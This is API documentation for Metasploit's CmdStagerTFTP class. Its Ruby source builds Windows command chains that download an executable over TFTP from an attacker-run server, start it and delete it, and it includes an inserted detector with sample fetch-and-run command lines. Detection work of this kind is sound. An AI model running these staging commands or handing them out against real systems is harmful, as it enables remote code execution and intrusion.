Class: Rex::Exploitation::CmdStagerTFTP

Inherits: CmdStagerBase
Defined in: lib/rex/exploitation/cmdstager/tftp.rb

Overview

This class provides the ability to create a sequence of commands from an executable. When this sequence is run via command injection or a shell, the resulting exe will be written to disk and executed.

This particular version uses tftp.exe to download a binary from the specified server. The original file is preserved, not encoded at all, and so this version is significantly simpler than other methods.

Requires: tftp.exe, outbound UDP connectivity to a TFTP server

Written by Joshua J. Drake

Methods inherited from CmdStagerBase

#compress_commands, #encode_payload, #generate_cmds, #initialize, #parts_to_commands, #slice_up_payload

Constructor Details

This class inherits a constructor from Rex::Exploitation::CmdStagerBase

Instance Attribute Details

#exe ⇒ Object (readonly)

Returns the value of attribute exe.



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 77

def exe
  @exe
end

#payload_exe ⇒ Object (readonly)

Returns the value of attribute payload_exe.



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 78

def payload_exe
  @payload_exe
end

#tftp ⇒ Object

Returns the value of attribute tftp.



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 79

def tftp
  @tftp
end

Instance Method Details

#cmd_concat_operator ⇒ Object



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 73

def cmd_concat_operator
  ' & '
end

#generate(opts = {}) ⇒ Object



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 27

def generate(opts = {})
  if opts[:tftphost].nil?
    raise "#{self.class.name}##{__callee__} missing opts[:tftphost]"
  end

  opts[:linemax] ||= @linemax
  opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
  opts[:temp] ||= '%TEMP%'

  @payload_exe = opts[:file]
  @payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}"

  generate_cmds(opts)
end

#generate_cmds_decoder(opts) ⇒ Object



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 65

def generate_cmds_decoder(opts)
  cmds = []
  cmds << "start \"#{@payload_path}\""
  # NOTE: We can't delete the payload while it is running.
  cmds << "del \"#{@payload_path}\"" unless opts[:nodelete]
  cmds
end

#generate_cmds_payload(opts) ⇒ Object



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 53

def generate_cmds_payload(opts)
  cmds = []
  # We can skip the destination argument if we're writing to the working directory,
  # as tftp defaults to writing the file to the current directory with the same filename.
  if opts[:file] == @payload_path
    cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}"
  else
    cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\""
  end
  cmds
end
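
For defenders, the command chain built by generate_cmds_payload and generate_cmds_decoder (joined with the ' & ' concat operator) has a recognizable shape in process-creation logs. The following Ruby detector is an added example, not part of Rex or Metasploit; the names detect_tftp_stager and Finding and the sample command lines are constructed for illustration.

```ruby
# Added example: flag command lines shaped like this stager's output.
# Chain: tftp -i <host> GET <file> ["<dest>"] & start "<dest>" [& del "<dest>"]
TFTP_GET = /\btftp(?:\.exe)?\s+-i\s+(?<host>\S+)\s+GET\s+(?<file>\S+)(?:\s+"(?<dest>[^"]+)")?\z/i
START    = /\Astart\s+"(?<path>[^"]+)"\z/i
DEL      = /\Adel\s+"(?<path>[^"]+)"\z/i

# Hypothetical result type for this example.
Finding = Struct.new(:host, :file, :path, :self_delete)

# Returns a Finding when one command line fetches a file with tftp in binary
# mode (-i) and later starts that same file; returns nil otherwise.
def detect_tftp_stager(cmdline)
  parts = cmdline.split('&').map(&:strip).reject(&:empty?)
  parts.each_with_index do |part, i|
    get = TFTP_GET.match(part)
    next unless get
    # With no destination argument, tftp writes <file> to the working directory.
    path = get[:dest] || get[:file]
    rest = parts.drop(i + 1)
    started = rest.any? { |c| (m = START.match(c)) && m[:path].casecmp?(path) }
    next unless started
    deleted = rest.any? { |c| (m = DEL.match(c)) && m[:path].casecmp?(path) }
    return Finding.new(get[:host], get[:file], path, deleted)
  end
  nil
end

# Constructed sample command lines (hosts are documentation addresses).
SAMPLES = [
  'cmd.exe /c tftp -i 192.0.2.10 GET qWeRtYuI.exe "%TEMP%\\qWeRtYuI.exe" & ' \
    'start "%TEMP%\\qWeRtYuI.exe" & del "%TEMP%\\qWeRtYuI.exe"',
  'cmd.exe /c tftp -i 192.0.2.10 GET qWeRtYuI.exe & start "qWeRtYuI.exe"',
  'tftp -i 192.0.2.20 GET switch-config.bin' # download only, nothing started
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each do |line|
    hit = detect_tftp_stager(line)
    if hit
      puts "ALERT host=#{hit.host} path=#{hit.path} self_delete=#{hit.self_delete}"
    else
      puts "ok    #{line}"
    end
  end
end
```

The detector only sees chains that arrive on a single command line; when the commands are logged as separate processes, correlate a tftp.exe GET with a later process start from the same path instead.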

#setup(mod) ⇒ Object



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 42

def setup(mod)
  self.tftp = Rex::Proto::TFTP::Server.new
  self.tftp.register_file(@payload_exe, exe)
  self.tftp.start
  mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
end

#teardown(mod = nil) ⇒ Object



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 49

def teardown(mod = nil)
  self.tftp.stop
end